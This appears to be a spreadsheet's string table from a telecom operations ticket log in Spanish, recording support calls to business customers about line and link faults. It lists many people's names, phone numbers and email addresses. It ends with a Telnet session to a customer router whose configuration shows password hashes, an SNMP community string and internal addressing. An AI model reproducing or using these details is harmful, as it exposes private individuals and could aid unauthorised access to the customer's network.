    <t>SE LLAMA A CLIENTE MELVIN SAY 54891453 MENCIONA QUE SI CUENTAN CON ENERGIA ELECTRICA POR LO QUE BRINDA CONTACTO DE PR GABRIELA ALEJANDRA - 54390451
-ID 3001746273</t>
  </si>
  <si>
    <t>F4569794</t>
  </si>
  <si>
    <t>CLENTE APLICA RESET Y SERVICIO RESTABLECE- ## SE PROCEDE AL CIRRE ##</t>
  </si>
  <si>
    <t>SE TIENE A LCIENTE EN LINEA- ##ESTA APLICANDO RESET A SU PBX</t>
  </si>
  <si>
    <t>DAYANA MELGAR-61220278
3001616146
COLA:
NOMBRE: A: 0050361220278
NÚMERO: 0050361220278
DURACIÓN: 0:00:24
ESTADO: CONECTADA
DETALLES: 0050361220278
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 19/05/2022 10:23:02</t>
  </si>
  <si>
    <t>F4569795</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERNESTO RIVERA - 56972210 SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001687712 - 3001689877</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RICARDO 56233926 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA CONTACTO DE PR ERNESTO RIVERA - 56972210
-ID 3001682002</t>
  </si>
  <si>
    <t>SE LLAMA A CLEINTE PR 22696671  PERO NO RESPONDEN, SE INTENTARA LUEGO
-ID 3001679923</t>
  </si>
  <si>
    <t>F4569799</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 77628310 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001772737</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO AL 77628310 NO RESPONDE, SE INTENTARA LUEGO **
-ID 3001843360
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES AL 45787911 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001920038
**</t>
  </si>
  <si>
    <t>F4569811</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON MELVIN CHACÓN/CLIENTE 23049696 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4569821</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE FRANCISCO ULLOA 78242588, CLIENTE INDICA QUE EL DÍA DE AYER ESTABA PRESENTANDO INCONVENIENTE CON INTERFERENCIA EN SUS LLAMADAS, INDICA QUE REPORTÓ 4 E1. SE LE COMENTA QUE EL INCONVENIENTE SE SOLVENTÓ EN HORAS DE LA TARDE POR LO QUE YA NO DEBERÍA DAR ESE PROBLEMA, SE LE SOLICITA AL CLIENTE REALIZAR PRUEBAS EL DÍA DE HOY PARA VALIDAR SI PERSISTE. SOLICITA SE LE LLAME A LAS 11 AM PARA VALIDAR.
ID DE LLAMADA: 3001570038</t>
  </si>
  <si>
    <t>F4569823</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
C143 - ENLACE DE DATOS CLARO - 625900194; 38300628</t>
  </si>
  <si>
    <t>F4569825</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES AL 45787911 SE LLAMA A CLIENTE NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 3001695185
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES  45787911 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
AUTORIZA CIERRE DEL TICKET **
ID 3001904077
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES AL 45787911 SE LLAMA A CLIENTE NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 3001588683
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES AL 45787911 CLIENTE SOLICITA QUE SE LE LLAME EN 15 MIN YA QUE NO ESTA EN SU LUGAR INDICA **
ID 3001560674
**</t>
  </si>
  <si>
    <t>F4569836</t>
  </si>
  <si>
    <t>CLIENTE NOS APOYA REINICIANDO LA PBX
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE REALIZA PRUEBAS DE LLAMADAS SALIENTES Y ENTRANTES, NOS CONFIRMA SERVICIO OPERATIVO, NOS AUTORIZA EL CIERRE DE CASO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4569844</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLAUDIA CUELLAR-77869632  OCMENTA QUE TUVIERON PROBLEMAS DE ENERGIA ##
3001716871
COLA:
NOMBRE: A: 0050377869632
NÚMERO: 0050377869632
DURACIÓN: 0:00:29
ESTADO: CONECTADA
DETALLES: 0050377869632
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 19/05/2022 11:20:00
3001716030
COLA:
NOMBRE: A: 0050377869632
NÚMERO: 0050377869632
DURACIÓN: 0:00:16
ESTADO: MARCANDO
DETALLES: 0050377869632
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 19/05/2022 11:19:18
PORT STATUS                                	= NORMAL
DEVICE NAME                                	= M02_SSSASVYK_E1_CAMPESTRE_02
NAME                                       	= FRAME:0/SLOT:3/PORT:11
ALIAS                                      	= NS_ASESORES_SA_DE_ CV
LOOPBACK STATUS                            	= NO
SIGNALING MODE                             	= CCS
CRC4 FRAME VERIFY SWITCH                   	= DISABLE
LINE CODE MODE                             	= HDB3
IMPEDANCE                                  	= 75¿
WORKING MODE FOR DIGITAL SECTION ACCESS    	= DIGITAL SECTION ACCESS
L2 MONITORING SWITCH                       	= ON</t>
  </si>
  <si>
    <t>F4569846</t>
  </si>
  <si>
    <t>**SE  LLAMA A CL CARLOS JIRON INDICA QUE AUN NO CUENTA CON SERVICIO || SE CONTACTA A GESTOR Y SE DEJA EN LIENA CON CLIENTE **
ID 3001594215
**</t>
  </si>
  <si>
    <t>F4569853</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 40713397 CONTESTA EL SEÑOR IGNASIO ENRIQUEZ INDICA QUE LE ESTAN LLAMANDO TAMBIEN DE CLARO Y ESTA BRINDANDO DATOS DE VISITA **
ID 3001603569
**</t>
  </si>
  <si>
    <t>F4569854</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RENE ARGUETA AL 26839266 -0050375631056 NOSE LOGRA COMUNICACION A NINGUN NUMERO SE INTENTARA LUEGO **
ID 3001611894 - 3001614124
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RENE ARGUETA AL 26839266 CONTESTA EL AGENTE ARNOLDO MONSOYA QUIEN INDICA QUE POR RATOS FUNCIONA EL SERVICIO Y POR RATOS NO || SE NOTIFICA A GESTOR **
ID 3001849701
**</t>
  </si>
  <si>
    <t>F4569856</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERICKA NAJARRO 78613972 SOLICITA SE LE LLAME AL 78613982 PARA REALIZAR PRUEBAS,</t>
  </si>
  <si>
    <t>CLIENTE UBICA EQUIPO ASMI54L ALARMADO, PROCEDE A REINICIARLO PERO CONTINÍA EN EL MISMO ESTADO. SE ABRIRÁ WO
ASMI54L
PWR    VERDE
ALM     ROJO
SYNC 1 ROJO</t>
  </si>
  <si>
    <t>F4569870</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN INGRESA LA LLAMADA AL IVR DEL SERVICIO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JORGE MOLINA AL 42418536  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001564979
**</t>
  </si>
  <si>
    <t>F4569874</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES  45787911 INDICANDOLE QUE NO HEMOS TENIDO COMUNICACION CON PR INDICA QUE ESTARA BUSCANDO OTRO CONTACTO PARA COMPARTIRLO .
ID 3001904077
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 77725540 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001785099</t>
  </si>
  <si>
    <t>**SE LLAMA A CL EN PDV 77725540 NO RESPONDE, SE INTENTARA LUEGO **
ID 3001896941
**</t>
  </si>
  <si>
    <t>F4569898</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CESAR TURCIOS 31651351 SE LE MENCIONA QUE A NIVEL DE CLARO TODO FUNCIONANDO DE MANERA CORRECTA, SE LE INDICA QUE SE HA OBSERVADO REGISTROS DE SATURACION
CLIENTE INDICA QUE ESCALARA CON SU IT
-ID 3001797919</t>
  </si>
  <si>
    <t>F4569900</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS DARDON 48279886 MENCIONA QUE LAS PRUEBAS QUE REALIZARON FUE HACE COMO 2 SEMANAS Y NO LLEGABAN AL ANCHO DE BANDA CONTRATADO, SE LE INDICA QUE A NIVEL DE CLARO SE OBERVA OPERATIVO Y ESTABLE
CLIENTE MENCIONA QUE NO PODRA LLEGAR A PR EL DIA DE HOY POR LO QUE SOLICITA LLAMADA PARA EL DIA LUNES A LAS 10:00 HRS
-ID 3001580010</t>
  </si>
  <si>
    <t>SE VALIDA LA CRONOLOGÍA DEL TICKET Y CLIENTE  CARLOS DARDON AL 48279886 ID 3001972205  SE LE CONFIRMA QUE POR PARTE DE NUESTRO LADO SE VE OPERATIVO Y ESTABLE  Y EL TICKET NO ESTARÁ EN MOVIMIENTO, PARA NO TENER EL TICKET SIN MOVIMIENTO SE LE INDICA QUE SE PROCEDERÁ CON EL CIERRE Y EN CASO ELLOS HAGAN SUS PRUEBAS EL DÍA LUNES Y VEN AFECTACIÓN, SE DEBERÁN DE  CONTACTAR PARA LA APERTURA DE UN NUEVO TICKET, ESTA DE ACUERDO, SE CIERRE EL TICKET ACTUAL SE NOTIFICA AL GESTOR EVELIN.MEJIA EL CAMBIO VÍA SKYPE</t>
  </si>
  <si>
    <t>F4569905</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARLEN ISABEL 98635703 MENCIONA QUE SI CUENTAN CON ENERGIA ELECTRICA Y YA APLICARON REINICIO A LOS EQUIPOS PERO INCONVENIENTE PERSISTE
-ID 3001694800 - 3001695608
NOMBRE DEL CLIENTE: REGISTRO NACIONAL DE LAS PERSONAS -
UBICACIÓN: MOROLICA CENTRO FRENTE AL PARQUE MUNICIPAL
CONTACTO EN SITIO: MIRIAN PATRICIA - 33517445
HORARIO DE ATENCION: 8:00 - 16:00
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4569907</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ARMANDO NIETO 26281016  QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001988305</t>
  </si>
  <si>
    <t>F4569926</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MERARY OSORIO 76040667 SE LE MENCIONA QUE EL SERVICIO A NIVEL DE CLARO SE ENCUENTRA OPERATIVO Y ESTABLE
CLIENTE MENCIONA QUE PERSISTE EL INCONVENIENTE, CLIENTE COLOCA EN LINEA A SU IT LUIS LEMUS SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001637670</t>
  </si>
  <si>
    <t>F4569929</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE PARTE DEL CLIENTE FRANKLIN ORELLANA ID: 3001698191 SOLICITANDO AVANCES, SE LE INFORMA QUE PR NO RESPONDE LLAMADAS PERO. CL CORRIJE NUMERO Y SE LLAMA A MARTA MONROY 59542457 ID: 3001708932, SE DEJA EN CONFERENCIA CL CENTRAL, PR Y GESTOR JAIMEJ.HERNANDEZ PARA PRUEBAS PENDIENTES | WIP</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE SOLICITANDO LOS ACCESOS PARA LOS TECNICOS ESTAMOS A LA ESPERA DE LA AUTORIZACION
DE: JOSE ARTURO CORADO JIMENEZ
ENVIADO: JUEVES, 19 DE MAYO DE 2022 11:51
PARA: TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; TIC-CALLCENTER@BANRURAL.COM.GT &lt;TIC-CALLCENTER@BANRURAL.COM.GT&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: GESTION DE PERMISOS || BANCO DE DESARROLLO RURAL, S.A. || 8900471T || 5 CALLE 5-13 ZONA 1 MALACATAN, SAN MARCOS
BUEN DÍA
ESTIMADO CLIENTE, POR ESTE MEDIO SOLICITO SU APOYO, PARA LA GESTIÓN DE PERMISOS NECESARIOS   PARA PERSONAL TÉCNICO CON RESPECTO AL ENLACE CON ID: 8900471T UBICADO 5 CALLE 5-13 ZONA 1 MALACATAN, SAN MARCOS ADJUNTO DATOS DE PERSONAL TÉCNICO.
JONATHAN DELGADO  IBM 52934
 BILLY JUAREZ IBM 612059
QUEDO A LA ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>F4569938</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS MERCADO 88107560 MENCIONA QUE YA REALIZARON DESCARTE DE  ENERGIA PERO PERSISTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001866265</t>
  </si>
  <si>
    <t>F4569946</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE Y AUTORIZA CIERRE DE CASO, SI VUELVE ENERGIA Y NO HAY SERVICIO SE HARA NUEVO REPORTE INDICA.
3001901825
COLA:
NOMBRE: A: 78444103
NÚMERO: 78444103
DURACIÓN: 0:01:08
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 78444103
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 19/05/2022 13:30:17</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 78444103 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 3001878247</t>
  </si>
  <si>
    <t>F4569961</t>
  </si>
  <si>
    <t>CLIENTE EVELYN ALVAREZ 54829794 COMENTA QUE TIENE INCONVENIENTES CON LAS SIGUIENTES EXTENSIONES 11125 Y 11126, INDICA QUE LUEGO DE RESTABLECER LA ENERGÍA ESTAS DOS EXTENSIONES YA NO RESPONDIERON. ID DE LLAMADA: 3001708751</t>
  </si>
  <si>
    <t>CLIENTE EVELYN ALVAREZ 54829794 REALIZA PRUEBAS Y VALIDA QUE EL E1 YA SE ENCUENTRA FUNCIONANDO, AUTORIZA EL CIERRE DEL CASO. 3001846573</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CLIENTE EVELY ALVAREZ QUIEN INDICA QUE LA UNICA EXTENSION QUE NO FUNCIONA ES LA 11125 DE CAROLINA GOMEZ. 3001727613</t>
  </si>
  <si>
    <t>F4569963</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE INGRID MORALES AL 22791218 // 22791219 NO RESPONDE || SE INTENTARA LUEGO **
ID 3001862170 - 3001862851
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE INGRID MORALES AL 22791218 // 22791219 NO RESPONDE EN AMBOS NUMEROS ||
 SE INTENTARA LUEGO **
ID 3001924022 - 3001924826
**</t>
  </si>
  <si>
    <t>F4569966</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA-  CESAR GARCIA-76635272 NO SCOMENTA QUE TUVO PROBLEMAS EL DIA DE AYER, ANTIER Y ANTES DE ANTIER-  CONPROBLEMAS DE AUDIO, RUIDO DE LLAMADAS, INTERFERENCIA DE LLAMADAS, Y SE LE COEMNTA QUE SE TUVO UNA FALLA MASIVA EN ESTOS TRES DIAS A NIVEL DEL SALVADOR## CLIENTE QUEDA ENTERADO + NOS COMENTA QUE SU PBX HOY POR LA MAÑANA ESTABA INIHBIDA --- SERVICIO YA ESTA UP, TODO OK- CLIENTE VALDIA ##
3001726199
COLA:
NOMBRE: A: 0050376635272
NÚMERO: 0050376635272
DURACIÓN: 0:04:11
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050376635272
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 19/05/2022 11:30:53</t>
  </si>
  <si>
    <t>F4569972</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE ENCARGADO AL 79687670, 59378052. NOSE LOGRA COMUNICACION A NINGUN NUMERO, SE INTENTARA LUEGO **
ID 3001868368 - 3001868849
**</t>
  </si>
  <si>
    <t>***SE LLAMO NUEVAMENTE A CONTACTOS BRINDADOS EN SITIO 79687670, 59378052 SIGUEN SIN RESPONDER, A ESPERA QUE CL BRINDE OTROS **
ID 1001010887 - 1001010977
**</t>
  </si>
  <si>
    <t>F4569974</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OSVALDO 62083478 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE, PERO SOLICITA RFO AL CORREO -- SOPORTETECNICO@ISCPELSALVADOR.ORG --
-ID 3001807977</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA LA ELABORACION DE RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 19 DE MAYO DE 2022 14:20
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JOSE ANGEL GODINEZ OVALLE &lt;JANGEL.GODINEZ@CLARO.COM.GT&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE RFO || INSTITUTO SALVADORENO DE CONTADORES PUBLICOS || F4569974
BUENA TARDE
     SOLICITO DE SU AMABLE APOYO CON LA ELABORACIÓN DE DICTAMEN TÉCNICO CON LOS SIGUIENTES DATOS:
EMPRESA 	ID 	TICKET
INSTITUTO SALVADORENO DE CONTADORES PUBLICOS
25230500SV
F4569974
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4569976</t>
  </si>
  <si>
    <t>SE LLAMA A CLEINTE SINDY HERNANDEZ-42044158  SE TIENE EN LINEA ##
3001751870
COLA:
NOMBRE: A: 42044158
NÚMERO: 42044158
DURACIÓN: 0:00:14
ESTADO: CONECTADA
DETALLES: 42044158
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 19/05/2022 11:43:38</t>
  </si>
  <si>
    <t>CLETNE CONFIRMA QUE NO ES PERSONAL DE CLARO EL QUE ESTA PRESENTE + QUE SE LE DE SEGUIMIENTO DESPUES DE LAS 14 HORAS ##
3001850395
COLA:
NOMBRE: A: 42044158
NÚMERO: 42044158
DURACIÓN: 0:04:49
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 42044158
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 19/05/2022 12:52:41</t>
  </si>
  <si>
    <t>SE TIENE A LCIENTE EN LINEA- SINDY HERNANDEZ-42044158 INDICA QUE PERSONAL DE CLARO ESTA PRESENTE- ## Y COMENTA QUE SOLO UN SERVICIO REPORTO, ##SE SIGUE EN LINEA CON CLIENTE-
3001850395
COLA:
NOMBRE: A: 42044158
NÚMERO: 42044158
DURACIÓN: 0:03:05
ESTADO: CONECTADA
DETALLES: 42044158
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 19/05/2022 12:49:56</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SINDY HERNANDEZ-42044158  ## SE TIENE EN LINEA ##VIVO</t>
  </si>
  <si>
    <t>CLIETEN NOS COMENTA QUE NO ESTA PERSONAL TECNICO PARA PODER APOYARNOS- QUE SE LE LLAME EN  40 MINUTOS ##</t>
  </si>
  <si>
    <t>F4569977</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON ARTURO FERNÁNDEZ/CLIENTE 506 87984875 SE LE PIDE APOYO CON EL CORREO QUE LE ENVIÓ GESTIÓN, INDICA QUE NOS CONTESTARÁ A LA BREVEDAD AUTORIZANDO LOS PERMISOS.</t>
  </si>
  <si>
    <t>F4569978</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE CON EVIDENCIA DE LAS ALARMAS DE ENERGIA EN SITIO REMOTO. QUEDAMOS ATENTOS AL CIERRE DEL INCIDENTE.
RE: SOLICITUD DE SOPORTE ::: ID LOCAL MEBASABK-4155998 ### ::: TICKET CNOC IMCRL004752 ### ::: LINK FLAPING</t>
  </si>
  <si>
    <t>F4569999</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YULINA GARCIA 54398305 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001760610</t>
  </si>
  <si>
    <t>SE HABLÓ CON YULINA GARCÍA/PR 54398305 INDICA QUE YA ESTÁ PUEDE RECIBIR A TÉCNICO; SE LLAMÓ/HABLÓ CON MARVIN ESCOBAR/TÉCNICO PLEX 58264989 INDICA QUE HAY EVENTO FUERA DE INSTALACIONES DE CLIENTE (ATENUACIÓN EN LA FO), ESPERARÁ A ÉSTOS PARA EMPEZAR LAS REPARACIONES, POR EL MOMENTO NO ES NECESARIO IR A PR.</t>
  </si>
  <si>
    <t>F4570000</t>
  </si>
  <si>
    <t>SE LLAMA A EDWIN MENDEZ 41029312, COMENTA QUE NO SE ENCUENTRA EN SITIO, SOLICITA CONTACTAR A OSCAR 46962768 3001756186</t>
  </si>
  <si>
    <t>EN LINEA CON OSCAR 46962768, SE LE SOLICITA APOYO PARA UBICAR EQUIPO CTC</t>
  </si>
  <si>
    <t>CLIENET UBICA EQUIPO CTC Y LO REINICIA, EQUIPO ENCIENDE PERO NO SE OBSERVA LINK DE FIBRA, SE ABRIRA WO PARA LA REVISIÓN</t>
  </si>
  <si>
    <t>F4570016</t>
  </si>
  <si>
    <t xml:space="preserve">	WO OPEN                        			11:27
1/4	LUIS RECINOS	58261474	2 HORAS	13:27:00
1/4	ADOLFO CRUZ	58261547	2 HORAS	13:27:00
1/4	EDGAR MATUL	58261564	2 HORAS	13:27:00
1/4	ERICK TRUJILLO	58261561	2 HORAS	13:27:00
1/4	MANUEL MAZARIEGOS	58261521	2 HORAS	13:27:00
1/4	ERICK MORALES	58261630	2 HORAS	13:27:00
2/4	SERGIO NIMATUJ	58261574	3 HORAS	14:27:00
3/4	FABRICIO RAMIREZ	58261213	5 HORAS	16:27:00
4/4	RODOLFO MORALES	58261609	6 HORAS	17:27:00</t>
  </si>
  <si>
    <t>&lt;QTZLGTLFN2T1E03A02EIM3&gt;PING VPN-INSTANCE CREDITO_OCCIDENTE 10.87.163.150
                                          ^
ERROR: TOO MANY PARAMETERS FOUND AT '^' POSITION.
&lt;QTZLGTLFN2T1E03A02EIM3&gt;PING -VPN-INSTANCE CREDITO_OCCIDENTE 10.87.163.150
  PING 10.87.163.150: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.87.163.150: BYTES=56 SEQUENCE=1 TTL=255 TIME=47 MS
    REPLY FROM 10.87.163.150: BYTES=56 SEQUENCE=2 TTL=255 TIME=43 MS
    REPLY FROM 10.87.163.150: BYTES=56 SEQUENCE=3 TTL=255 TIME=49 MS
    REPLY FROM 10.87.163.150: BYTES=56 SEQUENCE=4 TTL=255 TIME=47 MS
    REPLY FROM 10.87.163.150: BYTES=56 SEQUENCE=5 TTL=255 TIME=48 MS
  --- 10.87.163.150 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 43/46/49 MS
&lt;QTZLGTLFN2T1E03A02EIM3&gt;TELNET VPN-INSTANCE CREDITO_OCCIDENTE 10.87.163.150
TRYING 10.87.163.150 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.87.163.150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COOPERATIVA_OCCIDENTE_GT_SN_RAMON&gt;ENA
PASSWORD:
CC_COOPERATIVA_OCCIDENTE_GT_SN_RAMON#
CC_COOPERATIVA_OCCIDENTE_GT_SN_RAMON#SHO IP INT BRIE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FASTETHERNET3              UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0           UNASSIGNED      YES UNSET  UP                    UP
GIGABITETHERNET1           10.87.163.150   YES NVRAM  UP                    UP
LOOPBACK5                  10.212.142.92   YES NVRAM  UP                    UP
VLAN1                      100.60.17.1     YES NVRAM  UP                    UP
CC_COOPERATIVA_OCCIDENTE_GT_SN_RAMON#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.87.163.145           3   A4BE.2BE5.602F  ARPA   GIGABITETHERNET1
INTERNET  10.87.163.150           -   5006.ABE4.4D65  ARPA   GIGABITETHERNET1
INTERNET  100.60.17.1             -   5006.ABE4.4D60  ARPA   VLAN1
INTERNET  100.60.17.4            56   E0D5.5EBD.1E7A  ARPA   VLAN1
INTERNET  100.60.17.6             5   9405.B65C.DFAA  ARPA   VLAN1
INTERNET  100.60.17.7             2   0030.67A4.1401  ARPA   VLAN1
INTERNET  100.60.17.10           38   0023.AE9B.A9A6  ARPA   VLAN1
INTERNET  100.60.17.11          141   1866.DA03.7BD9  ARPA   VLAN1
INTERNET  100.60.17.12           85   1803.7333.EA3D  ARPA   VLAN1
INTERNET  100.60.17.13          179   0030.67DB.C595  ARPA   VLAN1
CC_COOPERATIVA_OCCIDENTE_GT_SN_RAMON#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 2847 BYTES
!
VERSION 15.4
NO SERVICE PAD
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_COOPERATIVA_OCCIDENTE_GT_SN_RAMON
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$KJXR$P6YAMG4AEK1LZMTULN.7G0
!
NO AAA NEW-MODEL
WAN MODE ETHERNET
!
!
!
!
!
!
!
!
IP CEF
NO IPV6 CEF
!
!
!
!
!
!
!
!
!
!
!
!
!
USERNAME GESTIONIP SECRET 5 $1$O.RA$U39ZMH588YZFA4CMQMVES.
!
!
CONTROLLER VDSL 0
 SHUTDOWN
!
!
!
!
!
!
!
!
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.142.92 255.255.255.255
!
INTERFACE ATM0
 NO IP ADDRESS
 SHUTDOWN
 NO ATM ILMI-KEEPALIVE
!
INTERFACE ETHERNET0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET0
 NO IP ADDRESS
 LOAD-INTERVAL 30
 SHUTDOWN
!
INTERFACE FASTETHERNET1
 NO IP ADDRESS
 LOAD-INTERVAL 30
 SHUTDOWN
!
INTERFACE FASTETHERNET2
 NO IP ADDRESS
 LOAD-INTERVAL 30
 SHUTDOWN
!
INTERFACE FASTETHERNET3
 NO IP ADDRESS
 LOAD-INTERVAL 30
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0
 DESCRIPTION LAN DEL CLIENTE
 NO IP ADDRESS
 LOAD-INTERVAL 30
!
INTERFACE GIGABITETHERNET1
 DESCRIPTION WAN PRINCIPAL/_/483200021T/_/
 BANDWIDTH 1024
 IP ADDRESS 10.87.163.150 255.255.255.248
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 100.60.17.1 255.255.255.0
 IP FLOW INGRESS
 IP FLOW EGRESS
 RATE-LIMIT INPUT 1024000 192000 384000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 1024000 192000 384000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP FLOW-TOP-TALKERS
 TOP 10
 SORT-BY BYTES
 CACHE-TIMEOUT 100
!
IP ROUTE 0.0.0.0 0.0.0.0 10.87.163.145
!
LOGGING SOURCE-INTERFACE LOOPBACK5
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION PARAJE CHILAGUNA CANTON SN. RAMON. SN. CRISTOBAL TOTONICAPAN, TOTONICAPAN
